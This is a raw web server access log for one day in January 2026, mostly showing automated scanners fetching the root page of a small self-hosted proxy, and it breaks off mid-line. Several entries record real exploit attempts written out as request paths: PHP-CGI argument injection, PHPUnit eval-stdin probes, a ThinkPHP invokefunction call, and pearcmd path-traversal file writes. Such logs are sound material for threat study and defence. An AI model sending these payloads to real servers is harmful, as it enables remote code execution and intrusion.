[Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/SQLiteManager/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/SQLite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/test/sqlite/SQLiteManager-1.2.0/SQLiteManager-1.2.0/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/SQLiteManager-1.2.4/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:11 +0000] 404 - GET http 78.131.122.113 "/agSearch/SQlite/main.php" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[31/Jan/2026:16:53:22 +0000] 404 - GET http 78.131.122.113 "/portal/redlion" [Client 20.65.193.198] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[31/Jan/2026:16:58:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 87.236.176.215] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)" "-" +[31/Jan/2026:17:10:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:19:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:20:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:23:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:25:14 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[31/Jan/2026:17:32:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:36:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 94.26.106.113] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:51:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:53:24 +0000] 200 - GET http 78.131.122.113 "/" [Client 18.207.144.231] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[31/Jan/2026:17:55:56 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 51.158.205.47] [Length 1033] [Gzip -] "masscan/1.3 (https://github.com/robertdavidgraham/masscan)" "-" +[31/Jan/2026:17:59:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:17:59:29 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 3.151.194.164] [Length 568] [Gzip 1.86] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:18:00:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:01:40 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 3.139.242.79] [Length 568] [Gzip 1.86] "air.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[31/Jan/2026:18:13:51 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "msnbot/1.1 ( http://search.msn.com/msnbot.htm)" "-" +[31/Jan/2026:18:21:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:21:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:22:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:23:33 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:34:55 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[31/Jan/2026:18:44:27 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 182.137.117.153] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:18:44:31 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 182.137.117.153] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:18:44:33 +0000] 404 - POST http 78.131.122.113 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:36 +0000] 405 - POST http 78.131.122.113 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 182.137.117.153] [Length 154] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:37 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:39 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:42 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:44 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:46 +0000] 404 - GET http 78.131.122.113 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:49 +0000] 404 - GET http 78.131.122.113 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:51 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:54 +0000] 404 - GET http 78.131.122.113 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:56 +0000] 404 - GET http 78.131.122.113 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:44:59 +0000] 404 - GET http 78.131.122.113 "/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:02 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:05 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:08 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:10 +0000] 404 - GET http 78.131.122.113 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:12 +0000] 404 - GET http 78.131.122.113 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:15 +0000] 404 - GET http 78.131.122.113 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:17 +0000] 404 - GET http 78.131.122.113 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:20 +0000] 404 - GET http 78.131.122.113 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:22 +0000] 404 - GET http 78.131.122.113 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:25 +0000] 404 - GET http 78.131.122.113 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:27 +0000] 404 - GET http 78.131.122.113 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:29 +0000] 404 - GET http 78.131.122.113 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:31 +0000] 404 - GET http 78.131.122.113 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:34 +0000] 404 - GET http 78.131.122.113 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:35 +0000] 404 - GET http 78.131.122.113 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:37 +0000] 404 - GET http 78.131.122.113 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:39 +0000] 404 - GET http 78.131.122.113 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:41 +0000] 404 - GET http 78.131.122.113 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:43 +0000] 404 - GET http 78.131.122.113 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:45 +0000] 404 - GET http 78.131.122.113 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:48 +0000] 404 - GET http 78.131.122.113 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:51 +0000] 404 - GET http 78.131.122.113 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:53 +0000] 404 - GET http 78.131.122.113 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:56 +0000] 404 - GET http 78.131.122.113 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:45:59 +0000] 404 - GET http 78.131.122.113 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:01 +0000] 404 - GET http 78.131.122.113 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:03 +0000] 404 - GET http 78.131.122.113 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:05 +0000] 404 - GET http 78.131.122.113 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:08 +0000] 404 - GET http 78.131.122.113 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:10 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:12 +0000] 403 - GET http 78.131.122.113 "/index.php?lang=../../../../../../../../tmp/index1" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:46:15 +0000] 404 - GET http 78.131.122.113 "/containers/json" [Client 182.137.117.153] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:18:49:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:53:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:54:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:18:55:15 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:12:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:13:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:16:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:17:39 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:24:52 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:40:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:47:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:53:09 +0000] 400 - GET http 78.131.122.113 "/aaa9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[31/Jan/2026:19:53:09 +0000] 400 - GET http 78.131.122.113 "/aab9" [Client 80.82.77.202] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" "-" +[31/Jan/2026:19:54:40 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:19:58:06 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:05:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:13:52 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 85.217.140.13] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:20:18:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:28:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:31:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:47:54 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:54:41 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:55:51 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:20:58:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:04:36 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:14:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:21:24 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 205.210.31.40] [Length 1033] [Gzip -] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[31/Jan/2026:21:23:34 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:26:07 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[31/Jan/2026:21:26:24 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36 OPR/60.0.3255.59" "-" +[31/Jan/2026:21:29:11 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:36:29 +0000] 404 - GET http 78-131-122-113.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 172.213.25.189] [Length 150] [Gzip -] "-" "-" +[31/Jan/2026:21:36:29 +0000] 404 - GET http 78-131-122-113.pool.digikabel.hu "/rip.php" [Client 172.213.25.189] [Length 150] [Gzip -] "-" "-" +[31/Jan/2026:21:40:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:40:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:49:48 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:58:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[31/Jan/2026:21:59:14 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 216.108.237.50] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:21:59:15 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 216.108.237.50] [Length 154] [Gzip -] "-" "-" +[31/Jan/2026:21:59:15 +0000] 404 - POST http 78.131.122.113 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 216.108.237.50] [Length 150] [Gzip -] "libredtail-http" "-" +[31/Jan/2026:21:59:16 +0000] 405 - POST http 78.131.122.113 